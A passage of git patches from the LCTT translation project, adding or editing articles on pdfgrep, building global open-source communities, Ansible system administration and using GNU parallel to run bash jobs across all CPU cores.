如果它在相同的工作目录或文件的路径,这是文件的名称。 + +我根据官方文档用 Python 3.6 运行命令。下图是结果。 + +![pdfgrep search][7] + +![pdfgrep search][7] + +红色高亮显示所有遇到单词 “queue” 的地方。在命令中加入 `-i` 选项将会匹配单词 “Queue”。请记住,当加入 `-i` 时,大小写并不重要。 + +pdfgrep 有相当多的有趣的选项。不过,我只会在这里介绍几个。 + + + * `-c` 或者 `--count`:这会抑制匹配的正常输出。它只显示在文件中遇到该单词的次数,而不是显示匹配的长输出, +  * `-p` 或者 `--page-count`:这个选项打印页面上匹配的页码和页面上的模式出现次数 +  * `-m` 或者 `--max-count` [number]:指定匹配的最大数目。这意味着当达到匹配次数时,该命令停止读取文件。 + + + +支持的选项的完整列表可以在 man 页面或者 pdfgrep 在线[文档][8]中找到。以防你在处理一些批量文件,不要忘记,pdfgrep 可以同时搜索多个文件。可以通过更改 GREP_COLORS 环境变量来更改默认的匹配高亮颜色。 + +下一次你想在 PDF 中搜索一些东西。请考虑使用 pdfgrep。该工具会派上用场,并且节省你的时间。 + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/search-pdf-files-pdfgrep/ + +作者:[Bruno Edoh][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com +[1] https://www.maketecheasier.com/what-is-grep-and-uses/ +[2] https://www.maketecheasier.com/ack-a-better-grep/ +[3] https://www.maketecheasier.com/the-beginner-guide-to-regular-expressions/ +[4] https://pdfgrep.org/ +[5] https://www.maketecheasier.com/install-software-in-various-linux-distros/ +[6] https://gitlab.com/pdfgrep/pdfgrep +[7] https://www.maketecheasier.com/assets/uploads/2017/11/pdfgrep-screenshot.png (pdfgrep search) +[8] https://pdfgrep.org/doc.html From 6dddddbb90cf004931225d41876cc223f3304f45 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 22 Dec 2017 09:12:00 +0800 Subject: [PATCH 0749/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Overcoming=20ch?= =?UTF-8?q?allenges=20when=20building=20great=20global=20communities?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... when building great global communities.md | 69 +++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 sources/tech/20171208 Overcoming challenges when building great global communities.md diff --git a/sources/tech/20171208 Overcoming challenges when building great global communities.md b/sources/tech/20171208 Overcoming challenges when building great global communities.md new file mode 100644 index 0000000000..4a5310ed3a --- /dev/null +++ b/sources/tech/20171208 Overcoming challenges when building great global communities.md @@ -0,0 +1,69 @@ +translating lujun9972 +Overcoming challenges when building great global communities +====== +Today's open source communities include people from all around the world. What challenges can you expect when establishing an online community, and how can you help overcome them? + +People contributing to an open source community share a commitment to the software they're helping to develop. In the past, people communicated by meeting in person at a set place and time, or through letters or phone calls. Today, technology has fostered growth of online communities--people can simply pop into a chat room or messaging channel and start working together. You might work with someone in Morocco in the morning, for example, and with someone in Hawaii that evening. + +## Global communities: 3 common challenges + +Anyone who's ever worked in a group knows that differences of opinion can be difficult to overcome. In online communities, language barriers, different time zones, and cultural differences can also create challenges. + +### Language barriers + +English is the predominant language in open source communities, so people without strong English language skills may find it difficult to understand documentation or suggest changes. To overcome this problem and attract community members from other areas, invite bilingual people into your community. Ask around--you might be surprised by who is fluent in other languages. Bilingual community members can help others contribute by helping to bridge language barriers, and can help your project engage with a wider audience by translating software and documentation. + +People also program in different languages. You might prefer working in Bash, for example, while others prefer Python, Ruby, C, and so on. This also means that people might find it difficult to contribute to your codebase because of the programming language. It is important for project leaders to choose a language that's been adopted by the software community in general. If you choose a less-used programming language, fewer people will participate. + +### Different time zones + +Time zones can present another challenge to open source communities. For example, if you are in San Francisco and want to schedule a video call with a member who is in London, you'll need to adjust for an 8-hour time difference. You may need to work very late or early, depending on the locations of your colleagues. + +Physical sprints, in which your team works together in the same time zone, can help address this challenge, but few communities can afford this option. Schedule regular virtual meetings to discuss your projects, and establish a regular time and place where everyone can discuss pending issues, upcoming releases, and other topics. + +Different time zones can also work to your advantage because team members can work around the clock. If you have a real-time communication platform such as IRC, users can find someone to answer their questions at any time of the day or night. + +### Cultural differences + +Cultural differences can be one of the greatest challenges for open source communities. People from different parts of the world have different ways of thinking, planning, and solving problems. Political situations can also affect work environments and influence decisions. + +As a project leader, you should strive to build an environment of tolerance for different perspectives. Cultural differences can encourage discussion among the community. Constructive discussions are always good for projects because they help community members see different angles of the same topic. Different opinions also help improve problem solving. + +To succeed in open source, your team must learn to embrace differences. This is not always easy, but diversity will ultimately benefit your community. + +## Additional ways to strengthen online communities + +**Go local:** Online community members may discover contributors who are located nearby--meet up and start a local community. Two people are all you need to start a community. Invite other users and employees at local companies; they might even offer space for future meetups. + +**Find or plan events:** Hosting events is a great, inexpensive way to build a local community. Get together at a local coffee shop or brewery to celebrate the newest version release or the implementation of a core feature. The more events you host, the more people will likely join you (even if just out of curiosity). Eventually, a company may offer you space for meetups, or you can raise funds to cover your expenses. + +**Keep in touch:** After each event, reach out to local community members. Collect email addresses or other contact information, and ask them to join your chat platform. Invite them to contribute to the wider community. You will likely discover lots of local talent, and who knows--you might even find your next core developer! + +**Share your experiences:** Your local community is a valuable resource, not only for you, but also for the wider community. Share your findings and experiences with others who might benefit from them. If you're sure how to start planning an event or a meetup, ask others for their insights. Chances are someone out there has experience that can help get you on the right track. + +**Consider cultural differences:** Remember that cultural norms vary by location and population, so scheduling a particular event in the early morning might be fine for people in one location, for example, but inappropriate for people in another. Of course, you can--and should--use references from the wider community to gain a better understanding of such differences, but you will sometimes need to experiment through trial and error. Don't forget to share what you learn so others can benefit from your experience. + +**Check your personal views:** Avoid airing strong opinions (especially regarding politics) in the work environment. This will only inhibit open communication and problem-solving. Instead, focus on engaging in constructive discussion with team members. If you do find yourself in a heated argument, take a step back, cool down, and refocus the discussion in a more positive direction. Discussions should always be constructive, and different perspectives should benefit your community. Never put your personal views before the community 's greater good. + +**Try asynchronous communication:** Real-time chat platforms are on everyone's radar these days, but don't forget email. If you can't find someone in your online platform, send them an email. Chances are you'll get a quick reply. Consider emerging platforms that focus on async communications, such as [Twist][1], and don't forget to check and update forums and wikis. + +**Try different solutions:** There's no single perfect formula, and the most effective way to learn is often through experience. Trial and error can teach you a lot. Do not be afraid to fail; you will learn from failure and you can never stop improving. + +## Communities require nurturing + +Think of your community as a small plant. Each day you must water it and make sure it gets sunlight and oxygen. Take the same approach to your communities: Listen to your contributors, and remember that you are dealing with human beings who need to be in constant communication to function properly. If your community loses the human touch, people will stop contributing to it. + +Finally, keep in mind that every community is different, and no single solution will ever apply to all of them. Be persistent and never stop learning from your community, and then adapt. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/working-worldwide-communities + +作者:[José Antonio Rey][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jose +[1]:https://twistapp.com From d2c558044cf0b45791e4ea042a09e163c094657d Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 22 Dec 2017 09:23:56 +0800 Subject: [PATCH 0750/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20auto?= =?UTF-8?q?mate=20your=20system=20administration=20tasks=20with=20Ansible?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ystem administration tasks with Ansible.md | 297 ++++++++++++++++++ 1 file changed, 297 insertions(+) create mode 100644 sources/tech/20170724 How to automate your system administration tasks with Ansible.md diff --git a/sources/tech/20170724 How to automate your system administration tasks with Ansible.md b/sources/tech/20170724 How to automate your system administration tasks with Ansible.md new file mode 100644 index 0000000000..6555159454 --- /dev/null +++ b/sources/tech/20170724 How to automate your system administration tasks with Ansible.md @@ -0,0 +1,297 @@ +translating by lujun9972 +How to automate your system administration tasks with Ansible +====== +Do you want to sharpen your system administration or Linux skills? Perhaps you have some stuff running on your local LAN and you want to make your life easier--where do you begin? In this article, I'll explain how to set up tooling to simplify administering multiple machines. + +When it comes to remote administration tools, SaltStack, Puppet, Chef, and [Ansible][1] are a few popular options. Throughout this article, I'll focus on Ansible and explain how it can be helpful whether you have 5 virtual machines or a 1,000. + +Our journey begins with the basic administration of multiple machines, whether they are virtual or physical. I will assume you have an idea of what you want to achieve, and basic Linux administration skills (or at least the ability to look up the steps required to perform each task). I will show you how to use the tools, and it is up to you to decide what to do with them. + +### What is Ansible? + +The Ansible website explains the project as "a radically simple IT automation engine that automates cloud provisioning, configuration management, application deployment, intra-service orchestration, and many other IT needs." Ansible can be used to perform the same tasks across a defined set of servers from a centralized location. + +If you are familiar with Bash for-loops, you'll find that Ansible operates in a similar fashion. The difference, however, is that Ansible is _idempotent_. In layman's terms this means that generally Ansible only performs the requested action if a change will occur as a result. For example, if you were to perform a Bash for-loop to create a user across all of your machines, it may look something like this: +``` +for server in serverA serverB serverC; do ssh ${server} "useradd myuser"; done +``` + +This would create **myuser** on **serverA** , **serverB** , and **serverC** ; however, it would run the **user add** command every single time the for-loop was run, whether or not the user existed. An idempotent system will first check whether the user exists, and if it does not, the tool will create it. This is a simplified example, of course, but the benefits of an idempotent tool will become more clear over time. + +#### How does Ansible work? + +Ansible translates _Ansible playbooks_ into commands that are run over SSH, which has several benefits when it comes to managing Unix-like environments: + + 1. Most, if not all of the Unix-like machines you are administering will have SSH running by default. + 2. Relying on SSH means that no agent is required on the remote host. + 3. In most cases no additional software needs to be installed as Ansible requires Python 2.6 in order to operate. Most, if not all distributions of Linux have this version (or greater) installed by default. + 4. Ansible does not require a _master_ node. It can be run from any host that has the Ansible package installed and sufficient SSH access. + 5. Although running Ansible in a cron job is possible, by default Ansible only runs when you tell it to. + + + +#### Setting up SSH key authentication + +A common method for using Ansible is to set up passwordless SSH keys to facilitate ease of management. (Using Ansible Vault for passwords and other sensitive information is possible, but is outside the scope of this article.) For now, simply generate an SSH key with the following command as shown in Example 1. + +##### Example 1: Generating An SSH Key +``` +[09:44 user ~]$ ssh-keygen +Generating public/private rsa key pair. +Enter file in which to save the key (/home/user/.ssh/id_rsa): +Created directory '/home/user/.ssh'. +Enter passphrase (empty for no passphrase): +Enter same passphrase again: +Your identification has been saved in /home/user/.ssh/id_rsa. +Your public key has been saved in /home/user/.ssh/id_rsa.pub. +The key fingerprint is: +SHA256:TpMyzf4qGqXmx3aqZijVv7vO9zGnVXsh6dPbXAZ+LUQ user@user-fedora +The key's randomart image is: ++---[RSA 2048]----+ +| | +| | +| E | +| o . .. | +| . + S o+. | +| . .o * . .+ooo| +| . .+o o o oo+.*| +|. .ooo* o. * .*+| +| . o+*BO.o+ .o| ++----[SHA256]-----+ +``` + +In Example 1, the _Enter_ key is used to accept the defaults. An SSH key can be generated by any unprivileged user and installed in any user's SSH **authorized_keys** file on the remote system. After the key has been generated, it will need to be copied to a remote host. To do so, run the following command: +``` +ssh-copy-id root@servera +``` + + _Note: Ansible does not require root access; however, if you choose to use a non-root user, you_ must _configure the appropriate **sudo** permissions for the tasks you want to accomplish._ + +You will be prompted for the root password for **servera** , which will allow your SSH key to be installed on the remote host. After the initial installation of the SSH key, you will no longer be prompted for the root password on the remote host when logging in over SSH. + +### Installing Ansible + +The installation of the Ansible package is only required on the host that generated the SSH key in Example 1. If you are running Fedora, you can issue the following command: +``` +sudo dnf install ansible -y +``` + +If you run CentOS, you need to configure Extra Packages for Enterprise Linux (EPEL) repositories: +``` +sudo yum install epel-release -y +``` + +Then you can install Ansible with yum: +``` +sudo yum install ansible -y +``` + +For Ubuntu-based systems, you can install Ansible from the PPA: +``` +sudo apt-get install software-properties-common -y +sudo apt-add-repository ppa:ansible/ansible +sudo apt-get update +sudo apt-get install ansible -y +``` + +If you are using macOS, the recommended installation is done via Python PIP: +``` +sudo pip install ansible +``` + +See the [Ansible installation documentation][2] for other distributions. + +### Working with Ansible Inventory + +Ansible uses an INI-style file called an _Inventory_ to track which servers it may manage. By default this file is located in **/etc/ansible/hosts**. In this article, I will use the Ansible Inventory shown in Example 2 to perform actions against the desired hosts (which has been paired down for brevity): + +##### Example 2: Ansible hosts file +``` +[arch] +nextcloud +prometheus +desktop1 +desktop2 +vm-host15 + +[fedora] +netflix + +[centos] +conan +confluence +7-repo +vm-server1 +gitlab + +[ubuntu] +trusty-mirror +nwn +kids-tv +media-centre +nas + +[satellite] +satellite + +[ocp] +lb00 +ocp_dns +master01 +app01 +infra01 +``` + +Each group, which is denoted via square brackets and a group name (such as **[group1]** ), is an arbitrary group name that can be applied to a set of servers. A server can exist in multiple groups without issue. In this case, I have groups for operating systems ( _arch_ , _ubuntu_ , _centos_ , _fedora_ ), as well as server function ( _ocp_ , _satellite_ ). The Ansible host file can handle significantly more advanced functionality than what I am using. For more information, see [the Inventory documentation][3]. + +### Running ad hoc commands + +After you have copied your SSH keys to all the servers in your inventory, you are ready to start using Ansible. A basic Ansible function is the ability to run ad hoc commands. The syntax is: +``` +ansible -a "some command" +``` + +For example, if you want to update all of the CentOS servers, you might run: +``` +ansible centos -a 'yum update -y' +``` + + _Note: Having group names based on the operating system of the server is not necessary. As I will discuss,[Ansible Facts][4] can be used to gather this information; however, issuing ad hoc commands becomes more complex when trying to use Facts, and so for convenience I recommend creating a few groups based on operating system if you manage a heterogeneous environment._ + +This will loop over each of the servers in the group **centos** and install all of the updates. A more useful ad hoc command would be the Ansible **ping** module, which is used to verify that a server is ready to receive commands: +``` +ansible all -m ping +``` + +This will result in Ansible attempting to log in via SSH to all of the servers in your inventory. Truncated output for the **ping** command can be seen in Example 3. + +##### Example 3: Ansible ping command output +``` +nwn | SUCCESS => { + "changed": false, + "ping": "pong" +} +media-centre | SUCCESS => { + "changed": false, + "ping": "pong" +} +nas | SUCCESS => { + "changed": false, + "ping": "pong" +} +kids-tv | SUCCESS => { + "changed": false, + "ping": "pong" +} +... +``` + +The ability to run ad hoc commands is useful for quick tasks, but what if you want to be able to run the same tasks later, in a repeatable fashion? For that Ansible implements [playbooks][5]. + +### Ansible playbooks for complex tasks + +An Ansible playbook is a YAML file that contains all the instructions that Ansible should complete during a run. For the purposes of this exercise, I will not get into more advanced topics such as Roles and Templates. If you are interested in learning more, [the documentation][6] is a great place to start. + +In the previous section, I encouraged you to use the **ssh-copy-id** command to propagate your SSH keys; however, this article is focused on how to accomplish tasks in a consistent, repeatable manner. Example 4 demonstrates one method for ensuring, in an idempotent fashion, that an SSH key exists on the target hosts. + +##### Example 4: Ansible playbook "push_ssh_keys.yaml" +``` +--- +- hosts: all + gather_facts: false + vars: + ssh_key: '/root/playbooks/files/laptop_ssh_key' + tasks: + - name: copy ssh key + authorized_key: + key: "{{ lookup('file', ssh_key) }}" + user: root +``` + +In the playbook from Example 4, all of the critical sections are highlighted. + +The **\- hosts:** line indicates which host groups the playbook should evaluate. In this particular case, it is going to examine all of the hosts from our _Inventory_. + +The **gather_facts:** line instructs Ansible to attempt to find out detailed information about each host. I will examine this in more detail later. For now, **gather_facts** is set to **false** to save time. + +The **vars:** section, as one might imagine, is used to define variables that can be used throughout the playbook. In such a short playbook as the one in Example 4, it is more a convenience rather than a necessity. + +Finally the main section is indicated by **tasks:**. This is where most of the instructions are located. Each task should have a **\- name:**. This is what is displayed as Ansible is carrying out a **run** , or playbook execution. + +The **authorized_key:** heading is the name of the Ansible Module that the playbook is using. Information about Ansible Modules can be accessed on the command line via **ansible-doc -a** ; however it may be more convenient to view the [documentation][7] in a web browser. The [authorized_key module][8] has plenty of great examples to get started with. To run the playbook in Example 4, simply use the **ansible-playbook** command: +``` +ansible-playbook push_ssh_keys.yaml +``` + +If this is the first time adding an SSH key to the box, SSH will prompt you for a password for the root user. + +Now that your servers have SSH keys propagated its time to do something a little more interesting. + +### Ansible and gathering facts + +Ansible has the ability to gather all kinds of facts about the target system. This can consume a significant amount of time if you have a large number of hosts. In my experience, it can take 1 to 2 seconds per host, and possibly longer; however, there are benefits to fact gathering. Consider the following playbook used for turning off the ability for users to log in with a password as the root user: + +##### Example 5: Lock down root SSH account + +``` +--- +- hosts: all + gather_facts: true + vars: + tasks: + - name: Enabling ssh-key only root access + lineinfile: + dest: /etc/ssh/sshd_config + regexp: '^PermitRootLogin' + line: 'PermitRootLogin without-password' + notify: + - restart_sshd + - restart_ssh + + handlers: + - name: restart_sshd + service: + name: sshd + state: restarted + enabled: true + when: ansible_distribution == 'RedHat' + - name: restart_ssh + service: + name: ssh + state: restarted + enabled: true + when: ansible_distribution == 'Debian' +``` + +In Example 5 the **sshd_config** file is modified with the [conditional][9] only executes if a distribution match is found. In this case Red Hat-based distributions name their SSH service different than Debian-based, which is the purpose for the conditional statement. Although there are other ways to achieve this same effect, the example helps demonstrate Ansible facts. If you want to see all of the facts that Ansible gathers by default, you can run the **setup** module on your localhost: +``` +ansible localhost -m setup |less + +``` + +Any fact that is discovered by Ansible can be used to base decisions upon much the same way the **vars:** section that was shown in Example 4 is used. The difference is Ansible facts are considered to be **built in** variables, and thus do not have to be defined by the administrator. + +### Next steps + +Now you have the tools to start investigating Ansible and creating your own playbooks. Ansible is a tool that has so much depth, complexity, and flexibility that it would be impossible to cover everything in one article. This article should be enough to pique your interest and inspire you to explore the possibilities Ansible provides. In my next article, I will discuss the **Copy** , **systemd** , **service** , **apt** , **yum** , **virt** , and **user** modules. We can combine these to create update and installation playbooks, and to create a basic Git server to store all of the playbooks that may get created. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/7/automate-sysadmin-ansible + +作者:[Steve Ovens][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/stratusss +[1]:https://opensource.com/tags/ansible +[2]:http://docs.ansible.com/ansible/intro_installation.html +[3]:http://docs.ansible.com/ansible/intro_inventory.html +[4]:http://docs.ansible.com/ansible/playbooks_variables.html#information-discovered-from-systems-facts +[5]:http://docs.ansible.com/ansible/playbooks.html +[6]:http://docs.ansible.com/ansible/playbooks_roles.html +[7]:http://docs.ansible.com/ansible/modules_by_category.html +[8]:http://docs.ansible.com/ansible/authorized_key_module.html +[9]:http://docs.ansible.com/ansible/lineinfile_module.html From 2407e7e02bdc068f96346f7baef83d0261308aed Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 22 Dec 2017 14:30:59 +0800 Subject: [PATCH 0751/1627] =?UTF-8?q?=E5=A2=9E=E5=8A=A0=E9=85=8D=E5=9B=BE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...rcoming challenges when building great global communities.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171208 Overcoming challenges when building great global communities.md b/sources/tech/20171208 Overcoming challenges when building great global communities.md index 4a5310ed3a..956f37affb 100644 --- a/sources/tech/20171208 Overcoming challenges when building great global communities.md +++ b/sources/tech/20171208 Overcoming challenges when building great global communities.md @@ -1,6 +1,8 @@ translating lujun9972 Overcoming challenges when building great global communities ====== +![配图][https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_community2.png?itok=1blC7-NY] + Today's open source communities include people from all around the world. What challenges can you expect when establishing an online community, and how can you help overcome them? People contributing to an open source community share a commitment to the software they're helping to develop. In the past, people communicated by meeting in person at a set place and time, or through letters or phone calls. Today, technology has fostered growth of online communities--people can simply pop into a chat room or messaging channel and start working together. You might work with someone in Morocco in the morning, for example, and with someone in Hawaii that evening. From 74d4b99c21bb646b29ef9f55e3cc6dba12270593 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 22 Dec 2017 14:45:26 +0800 Subject: [PATCH 0752/1627] rename --- ...2 Creating SWAP partition using FDISK - FALLOCATE commands.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename sources/tech/{20170802 Creating SWAP partition using FDISK & FALLOCATE commands.md => 20170802 Creating SWAP partition using FDISK - FALLOCATE commands.md} (100%) diff --git a/sources/tech/20170802 Creating SWAP partition using FDISK & FALLOCATE commands.md b/sources/tech/20170802 Creating SWAP partition using FDISK - FALLOCATE commands.md similarity index 100% rename from sources/tech/20170802 Creating SWAP partition using FDISK & FALLOCATE commands.md rename to sources/tech/20170802 Creating SWAP partition using FDISK - FALLOCATE commands.md From ab9adb95b0b25fb16df19c5dfc7e5cd8b20d1933 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 22 Dec 2017 14:50:00 +0800 Subject: [PATCH 0753/1627] =?UTF-8?q?=E5=A2=9E=E5=8A=A0=E9=85=8D=E5=9B=BE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... to automate your system administration tasks with Ansible.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20170724 How to automate your system administration tasks with Ansible.md b/sources/tech/20170724 How to automate your system administration tasks with Ansible.md index 6555159454..abe565e8ae 100644 --- a/sources/tech/20170724 How to automate your system administration tasks with Ansible.md +++ b/sources/tech/20170724 How to automate your system administration tasks with Ansible.md @@ -1,6 +1,7 @@ translating by lujun9972 How to automate your system administration tasks with Ansible ====== +![配图][https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_google_wave.png?itok=2oh8TpUi] Do you want to sharpen your system administration or Linux skills? Perhaps you have some stuff running on your local LAN and you want to make your life easier--where do you begin? In this article, I'll explain how to set up tooling to simplify administering multiple machines. When it comes to remote administration tools, SaltStack, Puppet, Chef, and [Ansible][1] are a few popular options. Throughout this article, I'll focus on Ansible and explain how it can be helpful whether you have 5 virtual machines or a 1,000. From c6a14e0cdc0dde854472d8ad47a10e86f53d8ed7 Mon Sep 17 00:00:00 2001 From: Alex Chen Date: Fri, 22 Dec 2017 15:04:52 +0800 Subject: [PATCH 0754/1627] Fix broken link --- sources/tech/20171215 Top 5 Linux Music Players.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171215 Top 5 Linux Music Players.md b/sources/tech/20171215 Top 5 Linux Music Players.md index 9c0bcaf38e..3725766d2f 100644 --- a/sources/tech/20171215 Top 5 Linux Music Players.md +++ b/sources/tech/20171215 Top 5 Linux Music Players.md @@ -1,7 +1,7 @@ Top 5 Linux Music Players ====== -![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/live-music.jpg?itok=Ejbo4rf7_ +![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/live-music.jpg?itok=Ejbo4rf7_) >Jack Wallen rounds up his five favorite Linux music players. Creative Commons Zero >Pixabay From 2ac972497badb1213a6440d94d0ad467fd49c2bc Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 22 Dec 2017 22:36:24 +0800 Subject: [PATCH 0755/1627] PRF&PUB:20171219 How To Use Your Entire CPU In Bash With Parallel.md @lujun9972 https://linux.cn/article-9164-1.html --- ...e Your Entire CPU In Bash With Parallel.md | 53 ++++++++++--------- 1 file changed, 27 insertions(+), 26 deletions(-) rename {translated/tech => published}/20171219 How To Use Your Entire CPU In Bash With Parallel.md (55%) diff --git a/translated/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md b/published/20171219 How To Use Your Entire CPU In Bash With Parallel.md similarity index 55% rename from translated/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md rename to published/20171219 How To Use Your Entire CPU In Bash With Parallel.md index 3772e3212f..1962d26650 100644 --- a/translated/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md +++ b/published/20171219 How To Use Your Entire CPU In Bash With Parallel.md @@ -1,88 +1,89 @@ -使用 Parallel 利用起你的所有 CPU 资源 +使用 parallel 利用起你的所有 CPU 资源 ====== -bash 命令通常单线程运行。这意味着所有的处理工作只在单 CPU 上执行。随着 CPU 规模的扩大以及核心数目的增加,这意味着只有一小部分的 CPU 资源被用于处理你的工作上去了。 -当我们的工作受制于 CPU 处理数据的速度时,这些未使用的 CPU 资源能产生很大的效用。这种情况在进行多媒体转换(比如图片和视频转换)以及数据压缩中经常遇到。 +bash 命令通常单线程运行。这意味着所有的处理工作只在单个 CPU 上执行。随着 CPU 规模的扩大以及核心数目的增加,这意味着只有一小部分的 CPU 资源用于处理你的工作。 -本文中,我们将会使用 [Parallel][1] 程序。Parallel 会接受一个列表作为输入然后在所有 CPU core 上并行地执行命令来处理该列表。Parallel 甚至会按顺序将结果输出到标准输出中,因此它可以用在管道中作为其他命令的标准输入。 +当我们的工作受制于 CPU 处理数据的速度时,这些未使用的 CPU 资源能产生很大的效用。这种情况在进行多媒体转换(比如图片和视频转换)以及数据压缩中经常遇到。 -### 如何使用 Parallel +本文中,我们将会使用 [parallel][1] 程序。parallel 会接受一个列表作为输入,然后在所有 CPU 核上并行地执行命令来处理该列表。Parallel 甚至会按顺序将结果输出到标准输出中,因此它可以用在管道中作为其他命令的标准输入。 + +### 如何使用 parallel + +parallel 在标准输入中读取一个列表作为输入,然后创建多个指定命令的进程来处理这个列表,其格式为: -Parallel 将标准输入中读取一个列表作为输入,然后创建多个指定命令的进程来处理这个列表,其格式为: ``` list | parallel command - ``` -这里的 list 可以由任何常见的 bash 命令创建,例如:`cat`,`grep`,`find`。这些命令的结果通过管道从他们的标准输出传递到 parallel 的标准输入,像这样: +这里的 list 可以由任何常见的 bash 命令创建,例如:`cat`、`grep`、`find`。这些命令的结果通过管道从它们的标准输出传递到 parallel 的标准输入,像这样: + ``` find . -type f -name "*.log" | parallel - ``` -跟 `find` 中使用 `-exec` 类似,`parallel` 使用`{}`来表示输入列表中的每个元素。下面这个例子中,`parallel` 会使用 gzip 压缩所有 `find` 命令输出的文件: +跟 `find` 中使用 `-exec` 类似,`parallel` 使用 `{}` 来表示输入列表中的每个元素。下面这个例子中,`parallel` 会使用 `gzip` 压缩所有 `find` 命令输出的文件: + ``` find . -type f -name "*.log" | parallel gzip {} - ``` 下面这些实际的使用 `parallel` 的例子可能会更容易理解一些。 -### 使用 Parallel 来进行 JPEG 压缩 +### 使用 parallel 来进行 JPEG 压缩 -在这个例子中,我收集了一些比较大的 `.jpg`( 大约 10MB 大小)文件,要用 [Mozilla][3] 出品的 JPEG 图像压缩工具 [MozJPEG][2] 来进行处理。该工具会在尝试保持图像质量的同时减少 JPEG 图像文件的大小。这对降低网页加载时间很重要。 +在这个例子中,我收集了一些比较大的 `.jpg` 文件(大约 10MB 大小),要用 [Mozilla][3] 出品的 JPEG 图像压缩工具 [MozJPEG][2] 来进行处理。该工具会在尝试保持图像质量的同时减少 JPEG 图像文件的大小。这对降低网页加载时间很重要。 + +下面是一个普通的 `find` 命令,用来找出当前目录中的所有 `.jpg` 文件,然后通过 MozJPEG 包中提供的图像压缩工具 (`cjpeg`) 对其进行处理: -下面是一个普通的 `find` 命令,用来找出当前目录中的所有 `.jpg` 文件然后通过 MozJPEG 包中提供的图像压缩工具 (`cjpeg`) 对其进行处理: ``` find . -type f -name "*.jpg" -exec cjpeg -outfile LoRes/{} {} ';' - ``` -总共耗时 `0m44.114s`。改命令运行时的 `top` 看起来是这样的: +总共耗时 `0m44.114s`。该命令运行时的 `top` 看起来是这样的: ![][4] 你可以看到,虽然有 8 个核可用,但实际只有单个线程在用单个核。 下面用 `parallel` 来运行相同的命令: + ``` find . -type f -name "*.jpg" | parallel cjpeg -outfile LoRes/{} {} - ``` -这次压缩所有图像的时间缩减到了 `0m10.814s`。从 `top` 现实中可以很清楚地看出不同: +这次压缩所有图像的时间缩减到了 `0m10.814s`。从 `top` 显示中可以很清楚地看出不同: ![][5] -所有 CPU core 都满负荷运行,有 8 个线程对应使用 8 个 CPU 核。 +所有 CPU 核都满负荷运行,有 8 个线程对应使用 8 个 CPU 核。 -### Parallel 与 GZIP 连用 +### parallel 与 gzip 连用 如果你需要压缩多个文件而不是一个大文件,那么 `parallel` 就能用来提高处理速度。如果你需要压缩单个文件而同时又想要利用所有的 CPU 核的话,那么你应该 `gzip` 的多线程替代品 [pigz][6]。 首先,我用随机数据创建了 100 个大约 1GB 的文件: -``` -for i in {1。.100}; do dd if=/dev/urandom of=file-$i bs=1MB count=10; done +``` +for i in {1..100}; do dd if=/dev/urandom of=file-$i bs=1MB count=10; done ``` 然而我用 `find -exec` 命令来进行压缩: + ``` find . -type f -name "file*" -exec gzip {} ';' - ``` 总共耗时 `0m28.028s`,而且也是只利用了单核。 换成 `parallel` 版本: + ``` find . -type f -name "file*" | parallel gzip {} - ``` 耗时减少到了 `0m5.774s`。 -Parallel 是一款非常好用的工具,应该加入到你的系统管理工具包中,在合适的场合它能帮你节省大量的时间。 +parallel 是一款非常好用的工具,应该加入到你的系统管理工具包中,在合适的场合它能帮你节省大量的时间。 -------------------------------------------------------------------------------- @@ -90,7 +91,7 @@ via: https://bash-prompt.net/guides/parallell-bash/ 作者:[Elliot Cooper][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From c7f59b3f5ffe632f9c8ef5c3e7b8a03c0cdc7842 Mon Sep 17 00:00:00 2001 From: FSSlc Date: Fri, 22 Dec 2017 23:14:26 +0800 Subject: [PATCH 0756/1627] [Translated] tech/20171119 10 Best LaTeX Editors For Linux.md --- ...0171119 10 Best LaTeX Editors For Linux.md | 266 ------------------ ...0171119 10 Best LaTeX Editors For Linux.md | 184 ++++++++++++ 2 files changed, 184 